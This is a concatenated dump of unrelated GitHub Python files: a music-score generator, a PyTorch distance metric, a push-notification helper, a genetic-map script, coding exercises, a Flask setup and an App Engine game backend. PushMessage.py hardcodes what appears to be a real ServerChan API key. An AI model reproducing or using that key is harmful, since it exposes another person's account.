maybe that's Ok\n rhythm_multipliers = gen_e.Line4.rhythm_multipliers\n rhythm_multipliers[18]=1\n clef=\"treble\"\n\nclass Line3Pulsed(Line3):\n rhythm_pulses = ID({}, default=0.5)\n # def update_data(self):\n # super().update_data()\n # if self.__class__.__name__ == \"Line3\": # this helps restrict tags to short score only\n # self.logical_ties[0].tag(\"\\clef treble\")\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line1(GenF, gen_e.Line1):\n pitch_displacement = gen_e.Line1.pitch_displacement.copy() # + Line3.pitch_displacement\n for i,p in Line3.pitch_displacement.non_default_items():\n for j in range(2):\n pitch_displacement[i + j*28] |= p\n pitch_displacement[38] = set((7,))\n pitch_displacement[40] = set()\n pitch_displacement[52] = set()\n pitch_displacement.flat(29)\n pitch_displacement[32] = set((-7,))\n pitch_displacement.flat(45)\n pitch_displacement[58] = set((12,))\n pitch_displacement.flat(111)\n # print(pitch_displacement)\n\n # show_data_type = machines.SegmentData\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1, limit=40)\n rhythm_multipliers.fillme(range(1,3),2)\n rhythm_multipliers.fillme(range(8,20),0.5)\n # print(rhythm_multipliers)\n rhythm_initial_silence = 32\n breaks = gen_e.Line1.breaks.copy()\n for i in breaks.keylist():\n breaks[i] = breaks[i] * 2 / 1.5\n breaks[6] = -3\n breaks[7] = -6\n breaks[10] = 2.5\n breaks[15] = 1.5\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n self.respell_events(\"flats\", 1, 18)\n self.respell_events(\"sharps\", 19)\n\n# -------------------------------------------------------------------------------------------------\nclass Line2(GenF, gen_e.Line2):\n clef = \"bass\"\n # rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1, limit=40)\n pitch_displacement_fifths = machines.FifthDisplacement(down=(0,))\n pitch_displacement_fifths.cycle_me(1, cycle=(1,-1,-1,1), times=36)\n pitch_displacement_fifths.down(12)\n pitch_displacement_fifths.up(34)\n pitch_displacement_fifths.flat(45,46,54,56,71,80,82,92,95,104,106,107,116,119,135)\n pitch_displacement_octaves = machines.OctaveDisplacement()\n pitch_displacement_octaves.cycle_me(1, cycle=(-1,1,0,-1,1,0), times=28)\n pitch_displacement_octaves.flat(13)\n pitch_displacement_octaves.flat(47)\n\n pitch_displacement = pitch_displacement_fifths + pitch_displacement_octaves\n\n # print(pitch_displacement)\n\n breaks = gen_e.Line1.breaks.copy()\n rhythm_initial_silence = 28\n for i in breaks.keylist():\n breaks[i] = breaks[i] * 2 / 1.5\n rhythm_multipliers = gen_e.Line2.rhythm_multipliers.copy()\n rhythm_multipliers.default = 1\n for i in rhythm_multipliers.keylist():\n print(i)\n rhythm_multipliers[i] = rhythm_multipliers[i] / 1.5\n\n # pitch_displacement = machines.FifthDisplacement()\n # for i,f in gen_e.Line2.pitch_displacement.non_default_items()[::2]:\n # pitch_displacement[i]=f\n\n # for i,p in Line3.pitch_displacement.non_default_items():\n # for j in range(2):\n # pitch_displacement[i + j*27] |= p\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line2:\n self.events[1].tag(\"\\clef bass\")\n self.respell_events(\"flats\", 1, 33)\n self.respell_events(\"sharps\", 34)\n\nclass Line2Pulsed(Line2):\n rhythm_pulses = ID({}, default=0.5)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line4(GenF, gen_e.Line3):\n # show_data_type=machines.SegmentData\n 
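# rest inserted before this line enters (a descriptive guess from the attribute name)\n    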
rhythm_initial_silence = 28\n pitch_displacement = gen_e.Line3.pitch_displacement +\\\n machines.FifthDisplacement(\n up= ( 16,17, 25, 26, 27, 31, 79),\n down= (1,4,7, 12, 14, 15, )) +\\\n machines.OctaveDisplacement(\n up= ( 4, 7, 19, ),\n down=(1, 17, 28, 56))\n pitch_reverse = gen_e.Line3.pitch_reverse + (3,)\n breaks = gen_e.Line3.breaks + {\n 2:-2,\n 4:-5,\n 10:4,\n }\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line4:\n self.events[1].tag(\"\\clef bass\")\n if self.__class__.__name__ == \"Line4\":\n self.tag_events(\"darkred\", every_child=True)\n\nclass Line4Pulsed(Line4):\n rhythm_pulses = ID({}, default=0.5)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line5(GenF, gen_e.Line5):\n rhythm_initial_silence = 30\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1)\n for i,r in gen_e.Line5.rhythm_multipliers.non_default_items():\n rhythm_multipliers[i] = r * 2\n breaks = gen_e.Line5.breaks.copy()\n breaks[1] = -2\n pitch_displacement = gen_e.Line5.pitch_displacement +\\\n machines.FifthDisplacement(\n up = ( 3, 11,13,14,15,32,33,34,37,44),\n down=(2,5,6,7,9,10, 42),\n ) + \\\n machines.OctaveDisplacement(\n up=(7,9),\n down=(13,14, 32, 35),\n )\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line5:\n self.events[1].tag(\"\\clef bass\")\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line6(GenF, gen_e.Line6):\n rhythm_initial_silence = 36\n # show_data_type = machines.SegmentData\n breaks = gen_e.Line6.breaks\n breaks[6] = 0.5\n breaks[19] = -4\n pitch_displacement = gen_e.Line6.pitch_displacement +\\\n machines.FifthDisplacement(\n up = ( 28,29,35,38),\n down=(1,3,7,12),\n ) + \\\n machines.OctaveDisplacement(\n up=(1,3,9,),\n down=( 29,47,)\n )\n # print(pitch_displacement)\n# -------------------------------------------------------------------------------------------------\n\nclass Line7(GenF, gen_e.Line6):\n # show_data_type = machines.SegmentData\n rhythm_initial_silence = 52\n breaks = ID()\n breaks.extend( [-3]*18 )\n breaks[10] = -3.5\n breaks[15] = -1\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers({\n 5:0.5,\n 9:0.5,\n 14:0.5,\n 18:0.5,\n },default=0.25)\n rhythm_times = 2\n pitch_displacement = gen_e.Line6.pitch_displacement.copy()\n pitch_displacement.flat(38)\n pitch_displacement = pitch_displacement + \\\n machines.FifthDisplacement(\n up = ( 11,12,17, 32, 35, 37,38,41, 48),\n down=(0,1,2,3, 18, 36, 42,43),\n ) + \\\n machines.OctaveDisplacement(\n up=(1,2,3, 23, 36, ),\n down=(10, 19, 38),\n )\n # print(pitch_displacement)\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__.__name__ == \"Line7\":\n self.tag_events(\"magenta\", every_child=True)\n# -------------------------------------------------------------------------------------------------\n\nbubbles.illustrate_me(__file__, \n lambda: staves.CopperShortScore(\n bubbles.Bubble(\n drone0 = Drone0(show_data_attr=\"original_depthwise_index\"),\n drone10 = Drone10(show_data_attr=\"original_depthwise_index\"),\n line1 = Line1(show_data_attr=\"original_depthwise_index\"),\n line2 = Line2(show_data_attr=\"original_depthwise_index\"),\n # line3 = Line3(show_data_attr=\"original_depthwise_index\"),\n line3 = Line3Pulsed(show_data_attr=\"original_depthwise_index\"),\n line4 = Line4(show_data_attr=\"original_depthwise_index\", 
clef=\"bass\"),\n line5 = Line5(show_data_attr=\"original_depthwise_index\"),\n line6 = Line6(show_data_attr=\"original_depthwise_index\"),\n line7 = Line7(show_data_attr=\"original_depthwise_index\"),\n ),\n sequence = (\"line1\",\"line2\",\"line3\",\"line4\",\"line5\",\"line6\",\"line7\",\"drone0\",\"drone10\"),\n stylesheets = (\"../../scores/stylesheets/shortscore.ily\",)\n ).get_lilypond_file(),\n as_midi=True,\n )\n","repo_name":"mirrorecho/rwestmusic-copper","sub_path":"copper/generations/gen_f/gen_f.py","file_name":"gen_f.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11480940152","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 21 09:57:18 2023\r\n\r\n@author: kisen\r\n\"\"\"\r\n\r\nimport torch\r\n\r\nclass distanceMetric():\r\n \r\n # Constructor to set the user-defined metric\r\n def __init__(self, distMetric, p=2.0):\r\n self.distMetric = distMetric\r\n \r\n if distMetric == \"p-norm\":\r\n self.distFunc = torch.nn.PairwiseDistance(p=p)\r\n \r\n elif distMetric == \"cosine\":\r\n self.distFunc = torch.nn.CosineSimilarity(dim=1)\r\n \r\n elif distMetric == \"absolute\":\r\n self.distFunc = torch.abs\r\n \r\n # Call-method to return the distance.\r\n def __call__(self, input1, input2):\r\n if self.distMetric == \"absolute\":\r\n return self.distFunc(input1 - input2)\r\n else:\r\n return self.distFunc(input1, input2)\r\n","repo_name":"kisen123/mastersthesis","sub_path":"mastersthesis/loss_module/distanceMetric.py","file_name":"distanceMetric.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13290812456","text":"import requests\nimport json\n\n\npush_base_url = \"https://sc.ftqq.com/\"\nsc_key = \"SCU63598T8dbcd2527aefac9c980e6625bd2e92235d99de5fb42e6\"\n\n\ndef push_message(text=\"Error\"):\n get_push_url = push_base_url + sc_key + \".send?\" + \"text=\" + str(text)\n requests.get(get_push_url)\n\n","repo_name":"Oumourin/Im-Fine-Thank-You","sub_path":"PushMessage.py","file_name":"PushMessage.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1304933728","text":"#!/usr/bin/python\n# Author: Mike Gloudemans\n# 7/18/2018\n\n# Write a genetic map file (showing recombination rates)\n# including every 1000 Genomes varaint.\n# Then bgzip and tabix it.\n\nimport gzip\nimport subprocess\n\n# Genetic map\nfor chrom in (range(1,23) + [\"X\"]):\n#for chrom in (range(7,23) + [\"X\"]):\n kg_file = \"/mnt/lab_data/montgomery/shared/1KG/ALL.chr{0}.phase3_shapeit2_mvncall_integrated_v5a.20130502.genotypes.vcf.gz\".format(chrom)\n\n filename = \"/mnt/lab_data/montgomery/nicolerg/genetic-map/genetic_map_GRCh37_chr{0}.txt\".format(chrom)\n output = \"/users/mgloud/projects/coloc_comparisons/data/genetic-map/extended_\" + filename.split(\"/\")[-1]\n\n last_pos = 0\n next_pos = 0\n last_map = 0\n next_map = 0\n\n with open(output, \"w\") as w:\n w.write(\"position COMBINED_rate(cM/Mb) Genetic_Map(cM)\\n\")\n with gzip.open(kg_file) as f1k:\n with open(filename) as f:\n f.readline()\n for kg_var in f1k:\n if kg_var.startswith(\"#\"):\n continue\n\n kg_var = int(kg_var.split()[1])\n if kg_var > next_pos:\n map_var = f.readline()\n if map_var == \"\":\n break\n map_var = map_var.strip().split()\n\n\n last_pos = next_pos\n next_pos = int(map_var[1])\n last_map = next_map\n 
next_map = float(map_var[3])\n                    current_rate = map_var[2]\n\n                current_map = last_map + ((kg_var - last_pos) * 1.0 / (next_pos - last_pos)) * (next_map - last_map)\n\n                w.write(\"{3}\\t{0}\\t{1}\\t{2}\\n\".format(kg_var, current_rate, current_map, chrom))\n\n    subprocess.check_call(\"cat {0} | uniq | sort -k2,2n > {0}.sorted\".format(output), shell=True)\n    subprocess.check_call(\"bgzip -f {0}.sorted\".format(output), shell=True)\n    subprocess.check_call(\"tabix -f -S 1 -s 1 -b 2 -e 2 \" + output + \".sorted.gz\", shell=True)\n\n\n","repo_name":"mikegloudemans/coloc_comparison","sub_path":"scripts/simulate_data/write_fine_recomb_maps.py","file_name":"write_fine_recomb_maps.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15591833076","text":"\"https://leetcode.com/problems/01-matrix/description/\"\nfrom collections import deque\nn= int(input())\na = []\nfor i in range(n):\n    tmp = list(map(int, input().split()))\n    a.append(tmp)\n\ndef solution_1(my_input):\n    # Time complexity\n    num_row = len(my_input)\n    num_col = len(my_input[0])\n    # step 1: initialize data\n\n    result = [[10000]*num_col for _ in range(num_row)]\n    for i in range(num_row):\n        for j in range(num_col): # big-O: O(n^2*r^2)\n            # check every element in the matrix to calculate its nearest distance\n            if my_input[i][j]==0:\n                result[i][j] = 0\n            else:\n                # scan every element again to find the minimum distance\n                for i1 in range(num_row):\n                    for j1 in range(num_col):\n                        if my_input[i1][j1] ==0 and (abs(i1-i) + abs(j1-j)) < result[i][j]:\n                            print(abs(i1-i) + abs(j1-j))\n                            result[i][j] = (abs(i1-i) + abs(j1-j))\n\n    return result\n\ndef solution_with_bfs(matrix):\n    # Using breadth-first search\n    # create a queue for the breadth-first search\n    # first, all zeros are level 1; 1s next to a 0 are level 2; 1s next to those are level 3\n    searched_queue = deque()\n\n    num_row = len(matrix)\n    num_col = len(matrix[0])\n\n    # first create the result matrix, which stores the distances\n\n    result = [[10000] * num_col for _ in range(num_row)]\n    # now we have a result matrix filled with the default value 10000\n    # loop, edit the result, and add cells to the queue\n    for i in range(num_row):\n        for j in range(num_col):\n            if (matrix[i][j] ==0):\n                # if matrix[i][j] == 0, set its result to 0 and add it to the queue as a source node\n                result[i][j] = 0\n                searched_queue.append([i,j])\n\n    # the queue now contains only the cells with value 0\n\n    # [row,column] => [left, right, up, down]\n    adjacent_list= [[0,1],[0,-1],[1,0],[-1,0]]\n    # this case is a little different\n    while searched_queue: # loop over the queue\n        # first we have to pop a cell\n        cell = searched_queue.popleft() #pop cell\n        current_row = cell[0]\n        current_col = cell[1]\n        # now look up the adjacent cells (a 1 may be next to this cell)\n        for i in adjacent_list:\n\n            new_row = current_row + i[0]\n            new_col = current_col + i[1]\n\n\n            if (new_row >= 0 and new_col >= 0 and new_row < num_row and new_col < num_col):\n                # this adjacent cell is still inside the matrix\n\n                if (result[new_row][new_col] > (result[current_row][current_col] + 1)):\n                    # only relax cells that are still more than one step farther away,\n                    # so each cell is enqueued a bounded number of times\n                    # if a 0 finds a 1 => that 1 gets distance (0+1)\n                    # if a 1 finds a 1 => that 1 gets current_distance + 1\n                    result[new_row][new_col] = (result[current_row][current_col] + 1)\n                    # then enqueue that cell so its own neighbors get processed\n                    searched_queue.append([new_row,new_col])\n    return 
result\nprint(solution_with_bfs(a))","repo_name":"huyngopt1994/python-Algorithm","sub_path":"leet-code/matrix/01_matrix.py","file_name":"01_matrix.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"31322762196","text":"\ndef get_opcode(inst):\n    s = str(inst)\n    if len(s) == 1:\n        return int(s)\n\n    if (len(s) == 2 and s[0] == '0'):\n        return int(s[1])\n    \n    return int(s[len(s) - 1:len(s)])\n\ndef get_opmodes(s):\n    t = str(s)\n    if len(t) <= 2:\n        return [0]\n\n    ret = []\n    for c in t[:2]:\n        ret.append(int(c))\n    return ret\n\ndef get_value(mode, arr, i):\n    if mode == 1:\n        return int(arr[i])\n    if mode == 0:\n        #print(\"INDEX: \" + str(i) + \" POINTS TO: \" + str(arr[i]) + \" WHICH IS REALLY: \" + str(arr[arr[i]]))\n        return int(arr[arr[i]])\n\ndef process_opcode(arr, i):\n    if i > len(arr) or i < 0 or arr[i] == 99:\n        return -1\n\n    op_code = get_opcode(arr[i])\n    op_mode = get_opmodes(arr[i])\n    while len(op_mode) < 2:\n        op_mode.insert(0, 0)\n\n    print(\"index \" + str(i) + \" inst: \" + str(arr[i]) + \" = \" + str(op_code) + \" \" + str(op_mode))\n    #if i == :\n    #    print(str(arr))\n    #    print(str(arr[i]))\n    #    print(str(arr[i+1]))\n    #    print(str(arr[i+2]))\n    #    print(str(arr[i+3]))\n    if op_code == 1 or op_code == 2:\n        C = get_value(op_mode[1], arr, i + 1)\n        B = get_value(op_mode[0], arr, i + 2)\n        #print(\"C: \" + str(C) + \" B: \" + str(B))\n        if op_code == 1:\n            arr[arr[i + 3]] = C + B\n            return 4\n        elif op_code == 2:\n            arr[arr[i + 3]] = C * B\n            return 4\n    elif op_code == 3:\n        arr[arr[i + 1]] = input(\"enter code\")\n        return 2\n    elif op_code == 4:\n        print(get_value(op_mode[0], arr, i + 1))\n        return 2\n    else:\n        return -1\n\n\ndef ans_5A():\n    f = open(\"data/5.txt\")\n    for d in f:\n        arr = [int(x) for x in d.split(\",\")]\n\n    keep_running = 0\n    i = 0\n    while keep_running != -1:\n        keep_running = process_opcode(arr, i)\n        i += keep_running\n\nans_5A()","repo_name":"EasyCodes/advent","sub_path":"advent_5.py","file_name":"advent_5.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"31952606801","text":"from flask import Flask\nfrom flask_smorest import Api\nfrom flask_cors import CORS\nfrom resources.mail_chimp import blp as MailchimpBlueprint\nfrom resources.google_analytics import blp as GoogleAnalyticsBlueprint\n\napp = Flask(__name__)\napp.config[\"API_TITLE\"] = \"REST API\"\napp.config[\"API_VERSION\"] = \"v1\"\napp.config[\"OPENAPI_VERSION\"] = \"3.0.3\"\napp.config[\"OPENAPI_URL_PREFIX\"] = \"/\"\napp.config[\"OPENAPI_SWAGGER_UI_PATH\"] = \"/docs\"\napp.config[\"OPENAPI_SWAGGER_UI_URL\"] = \"https://cdn.jsdelivr.net/npm/swagger-ui-dist/\"\napp.config[\"PROPAGATE_EXCEPTIONS\"] = True\nCORS(app)\napi = Api(app)\n\n\napi.register_blueprint(MailchimpBlueprint)\napi.register_blueprint(GoogleAnalyticsBlueprint)\n","repo_name":"digital-industry-group/Capstone2022","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7515950091","text":"data = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n\n\ndef removeDuplicates(nums):\n    length = len(nums)\n    nums.sort()\n    index = 1\n    # remove elements with a forward traversal\n    while index < length:\n        if nums[index] == nums[index - 1]:\n            nums.remove(nums[index - 1])\n            length -= 1\n            continue\n        index += 1\n    return len(nums)\n\n\ndef removeDuplicates1(nums):\n    # elements can also be removed with a reverse traversal\n    for num_index 
in range(len(nums) - 1, 0, -1): # reverse traversal in Python\n        if nums[num_index] == nums[num_index - 1]:\n            nums.pop(num_index)\n    return len(nums)\n\n\ndef removeDuplicates2(nums):\n    # two-pointer deduplication: efficient and elegant\n    nums.sort()\n    i = 0\n    for j in range(1, len(nums)):\n        if nums[i] != nums[j]:\n            i += 1\n            nums[i] = nums[j]\n    return i + 1\n\n\nprint(removeDuplicates1(data))\n\nprint(data)\n","repo_name":"letwant/leetcode","sub_path":"26 删除排序数组中的重复项/removeDuplicates.py","file_name":"removeDuplicates.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"38880847015","text":"import logging\nimport os;\nimport time, datetime, math;\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp import util\nfrom google.appengine.api import memcache\nfrom dbs import FBUsers, Games\nimport opensns\n\n# multilingual settings\nfrom django.conf import settings\nsettings._target = None\nos.environ['DJANGO_SETTINGS_MODULE'] = 'conf.settings'\nfrom django.utils import translation\nfrom django.utils import simplejson\nimport sys, urllib, logging\n\nkeyRecent = 'recentGames'\n\ndef getLevelText(lvl):\n    txt = \"lvl \" + str(lvl)\n    return txt\n\ndef getLevelScore(lvl):\n    fen = int(math.pow(2, lvl+1))\n    return fen\n\ndef setHandlerLocale(handle, lang):\n    os.environ['DJANGO_SETTINGS_MODULE'] = 'conf.settings'\n    translation.activate(lang)\n    lang = translation.get_language()\n    handle.request.LANGUAGE_CODE = lang\n    return lang\n\ndef getUserObject(objId):\n    LIM = datetime.timedelta(days=3)\n    cnt = 0\n    user = None\n    while user is None and cnt < 3:\n        try :\n            user = db.GqlQuery(\"SELECT * FROM FBUsers WHERE uid = :1\", str(objId)).get();\n        except :\n            user = None\n        cnt = cnt + 1\n\n    if user :\n        if user.era > datetime.datetime.today() - LIM and user.name:\n            return user\n    else :\n        user = FBUsers(uid=str(objId));\n\n    # whether we can fetch a user's new info\n    if opensns.sns :\n        info = opensns.sns.getUserInfo(objId)\n        user.src = opensns.sns.src\n        user.name = info['name']\n        user.icon = info['pic_square']\n    user.era = datetime.datetime.today()\n    user.put()\n    return user\n\nclass GameInfo():\n    name = ''\n    icon = ''\n    url = ''\n    res = ''\n    tim = ''\n    tms = 0 \n    src = 'FB'\n    lvl = 0\n\ndef formatGame(g, u=None):\n    ret = GameInfo()\n    if not u:\n        u = getUserObject(g.uid)\n    ret.url = u.getProfileUrl()\n    ret.tim = \"%02d:%02d:%02d\"%(g.tms.hour, g.tms.minute, g.tms.second);\n    ret.tms = g.tms\n    ret.res = g.res\n    ret.lvl = getLevelText(g.lvl)\n    ret.name = u.name\n    ret.icon = u.icon\n    ret.src = u.src\n    return ret\n\ndef checkUpgrade(u, v):\n    k = \"score_\" + str(u.uid)\n    fen = memcache.get(key=k)\n    if fen is None:\n        fen = 0\n    if v == 0 :\n        fen = 0\n    else : \n        fen = fen + v\n\n    if fen >= 3 and u.lvl < 10:\n        u.lvl = u.lvl + 1\n        fen = 0\n    memcache.set(key=k, value=fen, time=3600*6) # expire in 6 hours\n    return\n\ndef updateCache(g, u):\n    try :\n        g = formatGame(g, u)\n        games = memcache.get(key=keyRecent)\n        if not games:\n            games = []\n        games.insert(0, g)\n        del games[12:] ### at most 12 recent games\n        memcache.set(key=keyRecent, value=games, time=3600*24*3) # expire in 3 days\n    except :\n        pass\n    return\n\nclass AdminHandler(webapp.RequestHandler):\n    def get(self):\n        uid = self.request.get('uid', default_value='0')\n        src = self.request.get('src', default_value=None)\n        cmd = self.request.get('cmd', default_value=None)\n        if cmd != 'chsrc' or src is None:\n            a = _('FB')\n            b = 
_('XN')\n b = _('51')\n return\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n try :\n user = db.GqlQuery(\"SELECT * FROM FBUsers WHERE uid = :1\", uid).get();\n user.src = src\n user.put()\n self.response.out.write('OK')\n except :\n self.response.out.write('FAIL')\n return\n\nclass PhoneRegHandler(webapp.RequestHandler):\n def get(self):\n self.post();\n\n def post(self):\n uid = self.request.get('phone_user', default_value='0')\n opensns.init_sns(self)\n logging.info(\"user id is \" + uid)\n user = getUserObject(uid);\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n self.response.out.write('OK');\n logging.info(user.name)\n return\n\nclass PhoneRecentHandler(webapp.RequestHandler):\n def post(self):\n self.get()\n\n def get(self):\n opensns.init_sns(self)\n lang = self.request.get('phone_locale', default_value='en')\n lang = setHandlerLocale(self, lang)\n\n games = memcache.get(key=keyRecent)\n if not games:\n games = []\n for g in games:\n g.src = _(g.src)\n g.lvl = _(g.lvl)\n g.res = _(g.res)\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'games': games,\n }\n\n self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/recentgames.xml')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass CellPhoneHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/cellphone.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass HelpHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/help.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass RankHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n rev = int(self.request.get('rev', default_value='0'))\n lvl = int(self.request.get('lvl', default_value='10'))\n if rev == 1:\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE lvl=:1 ORDER BY score\", lvl).fetch(40);\n else :\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE lvl=:1 ORDER BY score DESC, win DESC\", lvl).fetch(40);\n\n rev = 1 - rev\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n lvls = [ _(\"lvl \" + str(i)) for i in range(10, -1, -1)]\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'users': users,\n 'lvls': lvls,\n 'lvl': lvl,\n 'rev': rev,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/rank.html')\n self.response.out.write(template.render(path, template_values))\n pass\n\nclass RecentGamesHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n\n games = memcache.get(key=keyRecent)\n if not games:\n games = []\n for g in games:\n g.src = _(g.src)\n g.lvl = _(g.lvl)\n g.res = _(g.res.capitalize())\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'games': 
games,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/recentgames.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass CleanGamesHandler(webapp.RequestHandler):\n def get(self):\n # make this to clean users.\n day = int(self.request.get('day', default_value='30'))\n tms = datetime.datetime.today() - datetime.timedelta(days=day)\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE era < :1 LIMIT 10\", tms);\n if users :\n for u in users :\n u.lvl = u.lvl - 1\n if u.lvl < 0:\n logging.info(\"delete user id: %s \" % u.uid );\n db.delete(u)\n else :\n logging.info(\"downgrade user id: %s \" % u.uid );\n u.era = datetime.datetime.today()\n u.put()\n pass;\n\nclass StartHandler(webapp.RequestHandler):\n def get(self):\n uid = self.request.get('uid');\n lvl = int(self.request.get('lvl', default_value='0'))\n if lvl >= 10:\n lvl = 9\n user = getUserObject(uid);\n\n gid = str(int(time.time()))\n newgame = Games(gid=gid, uid=uid, lvl=lvl)\n newgame.res = 'Start'\n newgame.tms = datetime.datetime.today()\n user.score = user.score - getLevelScore(newgame.lvl)\n user.lose = user.lose + 1\n updateCache(newgame, user)\n checkUpgrade(user, -1)\n user.put()\n self.response.out.write(gid);\n pass;\n\nclass ResultHandler(webapp.RequestHandler):\n def get(self):\n uid = self.request.get('uid');\n act = self.request.get('action');\n lvl = int(self.request.get('lvl', default_value='0'))\n if lvl >= 10:\n lvl = 9\n gid = str(int(time.time()))\n newgame = Games(gid=gid, uid=uid, lvl=lvl)\n\n fen = getLevelScore(lvl)\n user = getUserObject(uid);\n val = 0\n if act == 'win' :\n user.win = user.win + 1\n user.lose = user.lose - 1\n user.score = user.score + fen*2\n val = 2\n elif act == 'lose':\n val = 0\n else:\n user.draw = user.draw + 1\n user.lose = user.lose - 1\n user.score = user.score + fen*3/2\n val = 1 \n\n if lvl >= user.lvl:\n checkUpgrade(user, val)\n\n newgame.res = act.capitalize()\n newgame.tms = datetime.datetime.today()\n\n updateCache(newgame, user)\n user.put() \n\nclass InviteHandler(webapp.RequestHandler):\n def post(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n\n template_values = {\n };\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/invite_fb.html')\n self.response.out.write(template.render(path, template_values))\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n\n sns_uid = opensns.sns.uid\n if int(sns_uid) == 0 :\n self.ask_auth(opensns.sns.auth_url)\n return\n\n lang = opensns.sns.lang\n setHandlerLocale(self, lang)\n user = getUserObject(sns_uid)\n lim = user.lvl+1\n if lim > 10:\n lim = 10\n lvl = []\n for i in range(0, lim):\n t = \"lvl \" + str(i)\n lvl.append(_(t))\n\n tit = _(\"lvl \" + str(user.lvl))\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'sns_uid': sns_uid, \n 'user': user,\n 'lvl': lvl,\n 'tit': tit,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/index.html')\n self.response.out.write(template.render(path, template_values))\n\n def ask_auth(self, url):\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n self.response.out.write(\"\"\"\n \n \n auth \n \n \n \n \n \"\"\");\n\n\ndef main():\n application = webapp.WSGIApplication([('/', MainHandler), \n ('/start', 
